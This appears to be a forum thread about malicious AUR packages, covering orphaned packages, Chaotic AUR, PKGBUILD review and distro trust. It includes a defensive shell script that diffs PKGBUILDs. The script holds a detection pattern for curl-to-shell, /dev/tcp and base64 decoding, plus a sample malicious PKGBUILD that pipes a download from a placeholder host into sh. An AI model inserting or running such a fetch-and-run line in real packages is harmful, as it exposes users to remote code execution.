Malicious AUR packages

I don’t think there were ever any traffic numbers communicated by the AUR maintainers; people always looked at total packages. In my experience popularity/traffic falls exponentially, and these were orphaned packages…

But even if we assume an even distribution, it’s worth pointing out it was never 2% at the same time. The first wave was reversed after a few hours, later waves even quicker. So unless someone creates a good timeline, most of the time it was a fraction or even 0%.

It ain’t much, but there are plenty of entries among the orphans in the AUR that have seen their latest change over ten years ago… no clue when the first deletion request was submitted. But that one won’t even work out of the box.

Well, when they lift the AUR registration suspension, I’d recommend registering an account. You could either vote manually via the AUR site, or automatically via aur-sync-vote for all installed packages. Uninstalling an AUR package would then unvote it. Nevertheless, I strongly recommend using the package search to not only check the PKGBUILD, but also the pinned latest comments, as those usually provide additional information in case there is an issue. Personally, if I’m looking for something and it’s not available in the official repos, that’s where I check first.

Good advice, but not sure how that relates to my comment. What am I missing? Oh, and I am already registered there. But I didn’t know about the aur-sync-vote. That’s a good tip. Thanks!

Ah yes, the frog guy. Saying the AUR is the safest method simply because you can see the script you run is… I guess true at a surface level and after one ignores the skill needed and the time one needs to actually make sure it is safe, but Arch advanced distro yes, yes.

You miss him, don’t you? :broken_heart: I can tell :winking_face_with_tongue:

Someone made the mistake of asking on the Arch forum if some packages were safe - https://bbs.archlinux.org/viewtopic.php?id=313957

Some would argue that the Chaotic AUR has proven its worth during this period of chaos in the AUR. They caught some of the affected packages because they scan for malware. Also you can still peruse the PKGBUILD and view the diffs from the previous version at the AUR website whenever an update is available.

But the Chaotic AUR doesn’t include every AUR package, so one may not be able to escape examining & assessing PKGBUILDs in order to stay safe and malware free.

For balance, others would argue that the Chaotic AUR is potentially unsafe and there is no substitute for building a package yourself, or scrutinising the PKGBUILD etc. if using an AUR helper such as yay or paru.
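As an added example, not code from this thread, from the AUR, or from any helper: a small POSIX shell script that does the two things recommended above before `makepkg` ever runs, namely diff the cached PKGBUILD against the freshly fetched one and flag the lines a reviewer should read first. The two file paths, the pattern list and the sample PKGBUILDs it writes into a temp dir are all assumptions or constructed data; it does not touch the network.

```shell
#!/bin/sh
# Added example, not code from this thread or from the AUR tooling: a pre-build
# review helper for an AUR PKGBUILD. It diffs the cached copy against the freshly
# fetched one and flags lines a reviewer should read first. Hypothetical assumption:
# both files are already on disk (e.g. your helper's clone directory for the old one,
# a fresh `git clone https://aur.archlinux.org/<pkg>.git` for the new one).
# Nothing here touches the network.

# POSIX ERE of constructs worth a close read. A hit is a prompt to look, not a verdict:
# plenty of honest packages enable a unit or decode base64 for a legitimate reason.
SUSPICIOUS_RE='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|[[:space:]]eval[[:space:]]|/dev/tcp/|systemctl[[:space:]]+(--user[[:space:]]+)?enable|[.]config/autostart|nohup[[:space:]]|crontab'

# scan_pkgbuild FILE: print flagged lines with line numbers.
# Returns 0 when nothing matched, 1 when at least one line was flagged.
scan_pkgbuild() {
    hits=$(grep -nE "$SUSPICIOUS_RE" "$1" || true)
    if [ -z "$hits" ]; then
        return 0
    fi
    printf '%s\n' "$hits"
    return 1
}

# added_lines OLD NEW: only the lines the update added. A malicious push lives here;
# the untouched lines were already reviewed when the package was first installed.
added_lines() {
    diff -u "$1" "$2" | grep '^+[^+]' | sed 's/^+//' || true
}

# review_update OLD NEW: show the full diff, then scan just the added lines.
# Returns 0 when the additions are clean, 1 when something was flagged.
review_update() {
    echo "--- diff: cached vs fetched PKGBUILD ---"
    diff -u "$1" "$2" || true          # diff exits 1 when the files differ; expected
    echo "--- flagged additions ---"
    tmp=$(mktemp)
    added_lines "$1" "$2" > "$tmp"
    if scan_pkgbuild "$tmp"; then rc=0; else rc=1; fi
    rm -f "$tmp"
    return $rc
}

# make_demo DIR: write a constructed sample pair (not a real AUR package) into DIR:
# a harmless -bin PKGBUILD, and an "update" that bumps pkgrel and slips a
# curl-pipe-to-shell into package().
make_demo() {
    cat > "$1/PKGBUILD.old" <<'EOF'
pkgname=example-bin
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-$pkgver.tar.gz")
sha256sums=('SKIP')
package() {
    install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
}
EOF
    cat > "$1/PKGBUILD.new" <<'EOF'
pkgname=example-bin
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/example-$pkgver.tar.gz")
sha256sums=('SKIP')
package() {
    install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
    curl -fsSL https://example.invalid/setup.sh | sh
}
EOF
}

# Stand-alone demo run on the constructed pair.
DEMO=$(mktemp -d)
make_demo "$DEMO"
if review_update "$DEMO/PKGBUILD.old" "$DEMO/PKGBUILD.new"; then
    echo "RESULT: nothing flagged; still read the diff before running makepkg"
else
    echo "RESULT: flagged lines above need a human decision before makepkg runs"
fi
rm -rf "$DEMO"
```

Scanning only the added lines is the point: the first install is when you read the whole PKGBUILD, and every update afterwards only needs the diff read, which is exactly what the AUR web view offers per version. Treat a hit as a reason to open the comments and the upstream release, not as proof of anything.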

I know a lot of people here like him, but I found him from day one a very confrontational individual and generally someone to avoid, but that’s beside the point of this thread.

Honestly, either way I slice it, I feel like the AUR was always a ticking time bomb and we are feeling its first explosion. I imagine if someone really, really wants to be mean, they will find a way to slip through malware and 99% of users will not notice until it is too late.

I still stand by my recommendation of “use what the developer recommends”, but I understand even this method isn’t the full solution to the problem. Maybe it’s a combination of everything, alongside a very healthy dose of praying to whatever divinity you believe in that no malware slipped through.

Another developer isn’t necessarily concerned about what’s best for my system, nor would I expect them to be familiar with Arch or Arch packages. When they’re providing binary packages for Linux, the matter they’re primarily concerned with is distro compatibility, not security, or performance, or manageability.

So unsurprisingly they’ll say if using Debian derivatives, use the .deb package. If using Red Hat derivatives, use the .rpm package. For everyone else, use the FlatPak or AppImage, all for obvious compatibility reasons.

But why should I use the FlatPak or AppImage? The Arch packaging system handles .deb and .rpm files just fine. Most -bin AUR packages are likely using them. So their compatibility-based recommendation isn’t actually an issue.

Now if one is not in a position to modify a PKGBUILD for their purposes, or self-validate packages in the AUR, then I think grabbing a developer supplied or sponsored FlatPak or AppImage is a very reasonable alternative.

I want to add too @winnyace, it’s nice to have you back :smiley::+1:

Off topic

This frog guy, I wonder what happened, since it looks like he’s banned?
Like that all happened before I was here, but everything I find from him is either being helpful or funny. So it’s kinda weird. Like yes, it seems he was very active and kinda everywhere but still, not bad and usually trying to help?

Well, Winny was accurate: he had a rather short fuse… and I guess (I wasn’t behind the scenes) it went off once too often.
I kinda miss him myself, I resonate with acerbic humor.

I see, that would explain it. I was just curious, thanks :purple_heart:

I’ve been thinking about this topic a bit after watching a few videos on it. I’ve already posted these thoughts on another Linux forum, but I’d like to share them with you here as well.

I’ve always only installed packages from the AUR that had a lot of votes and that, for example, were linked to by the developers on GitHub or had a lot of positive comments. That way, I could be sure the AUR packages were trustworthy.

I’m not a developer, after all, and I just want to use Linux—not spend my time searching through source code for issues. Arch Linux states in its wiki that it doesn’t recommend the AUR, so it’s my own fault if I don’t review and analyze the changes in the PKGBUILD before installing new AUR packages or updates.

Unfortunately, there are packages, such as 1Password, that are only available in the AUR. There is no dedicated repository for Arch Linux, like the one 1Password offers for Debian/Ubuntu or Fedora. Yes, 1Password is available as a Flatpak. But it isn’t maintained regularly, so it’s outdated, and besides, browsers can’t connect to it when 1Password is running in the Flatpak sandbox. I could download it as an archive from the website and try to get that version to work. But do I want to do that? I don’t want to mess around with it.

My Samsung printer drivers are also only available in the AUR. Luckily, I still have a very old Linux driver from Samsung sitting on my hard drive and was able to install it in Arch Linux. I always install this one from the disk in other distributions as well.

I find Arch Linux particularly interesting because of the packages in the AUR—you can get just about anything there. In some cases, you have no chance of finding packages in other distributions. But they’re available in the AUR. So why don’t the Arch developers “integrate” the AUR better? Why aren’t there any hurdles to overcome when adopting orphaned packages? Why aren’t uploaded packages reviewed?

Like I said, I’m not a developer. When I look at the source code for packages, I’m completely lost. But does that mean I have to be told I’m not a “real” Arch user? Arch Linux is exactly what I was looking for. But I’m just a user…

That’s why I decided yesterday to switch back to Fedora. Maybe Arch Linux really isn’t for me. I don’t know, and I’m at a loss and sad at the same time… :sad_but_relieved_face:

If you’re not comfortable with how things are done, then I guess the obvious conclusion is it’s not for you. For me (as a retired IT person), I have the time and the ‘shit doesn’t matter’ ability for it to not be the end of the world if I actually contract malware (while keeping a weather eye on things to avoid it).

Though I will say two things: 1) nothing has changed, it’s always been this way; 2) in other places (particularly corporate), things happen that you’re definitely never going to hear about (it would be bad for the company).

You’re far from the only one to think that, and ultimately it’s unsurprising that he was suspended.

Despite me deliberately poking your antipathy to :frog: it is good to have you back :hugs:

Fedora is a good choice :+1: I was considering it myself too this week. Being a Fedora user doesn’t prevent you from using this forum.

I think the “nothing has changed” point is the key one.

The incident was serious, but it didn’t fundamentally change the trust model of either Arch or the AUR. While the situation has been quite noisy, the actual number of affected users is very small. Personally, I prefer to view it without dramatization, and I think it may even have a positive effect in the medium to long term, by improving security awareness at both a user level and within the community.

:100: agree on this.

I really can’t follow the idea behind switching distro “because AUR is under attack and I have to be careful” thing.

Like just because it happens here, doesn’t mean you will be safe somewhere else.

Like it happened with the DDoS attack. It happened with the AUR, later it happened with Ubuntu…
It’s very likely stuff like this right now will also happen somewhere else. No one is safe.

Also, saying “I’m no dev and I don’t want to read source code/package builds” or “I can’t cuz I’m lost” or anything in that regard… Yes, I’m also lost reading code (I am willing to learn though). And yes, the Arch forum would very likely rip me apart mid-air for it. But it is known that they aren’t the friendliest to newcomers, so who cares?
Yes you are taking a risk when using the AUR, but if you are aware of it, and have backups and you know at least somewhat what you’re doing, it’s fine in my book.
But changing distro won’t change anything, the risks are still there, especially when you start downloading stuff that isn’t in the main repos.

Firstly, thank you! I’m glad to see you’re still around here! :heart:

Secondly, yeah, you’re right, but I feel like that’s not really the developer’s business and it shouldn’t be. They just made an app and they would like people to use it. They don’t care about what else you’re running and how. They care about their app and how well that one runs and how well it is protected.

But you’re touching on something else interesting: what’s exactly the difference between a .deb package and a .rpm package? As far as I can tell… not much, really. It’s just different formats for different package managers that do things ever so slightly differently, but enough to cause the developer pain in the rear. For as many shots as Flatpaks, Snaps and AppImages get, they solve this problem from the developer POV very well and often simplify my life too. I can’t lie when I say that I simply prefer my stuff to work rather than to tinker with my system.

Yeah, these alternative methods also have their issues, but again, if the developer recommends a method, unless I find a better one elsewhere that is somewhat official or trustworthy enough, I will just use what the developer says, of course unless the package isn’t available in the Arch repos already. I trust the developer enough to use their software, I can trust them to offer me a way to install it on my system without much hassle on our ends too.


I imagined that too, but I also saw many who found it endearing. His knowledge was really obvious, just too bad he had such a large ego alongside it and seemed more interested in following ideologies than balanced output…

Thank you! I am glad you are also still around. :blush: :heart:


I know I woke up one day with him and another guy he seemed to be close with being perma banned for similar reasons. Both of them were very… confrontational and seemingly more interested in picking fights and trolling than having measured and balanced discussions.

Speaking of trust level, let us not forget that there was also an incident, reported at the beginning of this month, with this npm stuff at Red Hat, which ironically is closely related (so to speak) to Fedora. As they say, if it can happen there it can happen anywhere.